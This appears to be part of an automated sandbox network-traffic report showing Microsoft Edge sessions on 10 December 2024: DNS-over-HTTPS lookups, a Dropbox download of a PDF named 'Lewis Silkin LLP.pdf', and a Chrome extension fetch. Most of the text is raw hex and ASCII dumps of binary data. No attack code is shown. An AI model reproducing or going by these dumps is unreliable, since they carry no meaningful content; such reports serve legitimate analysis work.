                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 df 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom(c)


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        12192.168.2.649765162.125.69.154437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:31 UTC888OUTGET /cd/0/get/CgAV6hxZ-A3hQzTu2Stg3LHFDeMnudBRIOasHxeY3jHwYLSfARGUmzl5s0_-flqSUCT-0eeqW-WUyn6n4GefjtH9u4MSRz2brkZ7vKHaMcGku5sFmxi4aIg5GYOzhOBlVWy5vDL2jJ-0e5yl43IRZEtV/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC668INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                                                        Etag: 1733686441286063d
                                                                                                                                                                                                                                                                                                                        Pragma: public
                                                                                                                                                                                                                                                                                                                        Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                                                        X-Server-Response-Time: 145
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:31 GMT
                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                        Content-Length: 106848
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                                                        X-Dropbox-Request-Id: b2f4b128e35945cead347a9d23663e90
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC15716INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                                                        Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC16384INData Raw: 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a da ba bd 36 79 b9 65 55 4f 15 1b ec f4 7f 3d 0e c6 da 74 b9 b6 8e 78 ce 63 91 43 a9 f5 04 64 54 b5 c9 fc 38 d5 46 ab e0 9b 17 e0 3c 00 db b2 8e db 38 03 fe f9 db 5d 65 5c 65 cd 14 ce 5a f4 dd 2a 92 a6 fa 3b 05 14 51 54 64 14 51 45 00 14 76 aa 5a ad c4 f6 9a 55 d5 c5 b2 07 9a 28
                                                                                                                                                                                                                                                                                                                        Data Ascii: E2`f0T~U|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>6yeUO=txcCdT8F<8]e\eZ*;QTdQEvZU(
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC668INData Raw: 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f 4c e0 31 77 1a 13 e8 4e 96 84 1b 53 8c 71 77 5c 66 8d 8e e9 3a fa d5 5e 26 5d 98 7f f2 ac c7 63 f1 c8 19 75 72 38 6e 62 6c be b5 9b 25 c1 1e 73 48 86 2e 39 7b 50 36 2f b4 50 51 b2 4e c7 93 fb a5 0e e4 7c dd 1d cd 5b ee 61 05 a7 bf b3 7d aa 23 63 d2 d5 bd 2d ae c9 0b 6f 65 9d bf
                                                                                                                                                                                                                                                                                                                        Data Ascii: gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu|n:27wUW:Jj+boL1wNSqw\f:^&]cur8nbl%sH.9{P6/PQN|[a}#c-oe
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                                                        Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC16384INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                                                        Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC16384INData Raw: c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e 3d 78 f3 0f 4f 4d 85 ac 94 49 8f 6b ac 41 1f 92 52 2f 94 d2 4d 10 5b 7e ac 88 ed 68 72 27 d2 a0 96 06 d5 d4 23 29 bc 16 05 0f 19 c1 08 09 86 09 30 84 03 2d a2 4b c0 96 08 26 1e 4b 3c 9d d0 24 12 ae b2 9f 2e 8a 2e 5e 90 68 de 4a 15 65 c9 c7 63 cb 41 06 e4 f9 f7 d5 71 83 33 f3 4b 19 8a 85 b0 01 e1 68 79 d8 0f 54 2a 68 da 20 82 d5 b8 e3 f1 f7 1e 1b b6 25 46 ca bd 77 1c bd b3 a1 6c 49 75 05 4c 36 a1 1c 01 35 4a 4c ca 6e df f4 cc 96 95 f2 c0 ad 4f 6f b1 c6 62 12 45 5c 58 75 ff 37 67 22 3b f6 ed 4e 40 d1 d6 88 96 60 21 82 1f 4d 77 05 8d c2 a5 9b 08 bd 96 b0 46 1a db 1e dc b0 ef 99 23 75 40 10 00 a2 a2 04 65 6a 2f 6c 77 11 bb a1 59 8e 48 a2 d5 6a a7 69 11 ad 7c 12 14 81 28 a6 cb
                                                                                                                                                                                                                                                                                                                        Data Ascii: =kDc)Vc=xOMIkAR/M[~hr'#)0-K&K<$..^hJecAq3KhyT*h %FwlIuL65JLnOobE\Xu7g";N@`!MwF#u@ej/lwYHji|(
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC16384INData Raw: 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c d4 aa a9 5b 54 db dc fc 4a 9a 91 b1 a6 32 c6 d4 cc ba 95 2d de dd cd 6f 0e 60 ec e6 cd 8c e9 1f 9a d7 3c 7f d1 fa 77 d5 41 8c 2d a9 67 cc 16 98 df 74 fa bc d7 ca 77 14 32 b6 6d 14 63 f6 0f 1a 1b 6a eb 3b 0f df f3 1a da b3 a2 bd 81 8d 70 d8 ee 49 3f 88 34 da 63 59 8d 8b 5a 56 0f 1b 63 3c 84 f4 47 8c 2d 9c d9 b4 a4 ae b6 ed c8 a6 53 18 db d5 9b b1 41 86 45 b5 ab 9b f3 17 65 ff 09 f9 8d 28 ef 5d d4 d0 52 7b ed d9 5b 57 32 de 7d 2f d2 e7 2c ae 5d d4 e0 8a bf 70 05 63 9f e1 99 7d 5a 9a 97 2c 6f e9 72 b3 8d 18 cf 9d a2 7c f3 b2 86 e6 db 7f 58 f0 08 63 6b 2f c6 e3 be 67 62 2e 0c 23 2e 5a 18 77 f5 b7 73 ec 43 bf 66 a9 26 26 ec c1 4f d6 3e 27 f8 9d ef 6e 7d f2 87 43 47 5a e3 3e 35
                                                                                                                                                                                                                                                                                                                        Data Ascii: 'G+x)}&N-wcu#<[TJ2-o`<wA-gtw2mcj;pI?4cYZVc<G-SAEe(]R{[W2}/,]pc}Z,or|Xck/gb.#.ZwsCf&&O>'n}CGZ>5
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                                                        Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        13192.168.2.649782172.64.41.34437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 07 64 6c 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 42 00 0c 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: dl-edgesmartscreenmicrosoftcomA)B>
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 17:40:33 GMT
                                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                        CF-RAY: 8eff054a6e0a4334-EWR
                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 07 64 6c 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d e3 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 3f 00 05 00 01 00 00 00 ff 00 30 0f 70 72 6f 64 2d 61 67 69 63 2d 6e 63 75 2d 33 0e 6e 6f 72 74 68 63 65 6e 74 72 61 6c 75 73 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2a c0 81 00 06 00 01 00 00 00 0f 00 30 06 6e 73 31 2d 30 32 09 61 7a 75 72 65 2d 64 6e 73 c0 2a 06 6d 73 6e 68 73 74 c0 20 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 ec 00 0c 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                        Data Ascii: dl-edgesmartscreenmicrosoftcomA&prod-atm-wds-edgetrafficmanagernet?0prod-agic-ncu-3northcentraluscloudappazure*0ns1-02azure-dns*msnhst ',:<)


                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                        14192.168.2.649785142.250.181.654437420C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                        Content-Length: 138356
                                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
                                                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                                                        Expires: Wed, 10 Dec 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                        Age: 3333
                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                                                        ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC821INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83
                                                                                                                                                                                                                                                                                                                        Data Ascii: _q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\|=
                                                                                                                                                                                                                                                                                                                        2024-12-10 17:40:33 UTC1390INData Raw: fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8
                                                                                                                                                                                                                                                                                                                        Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=
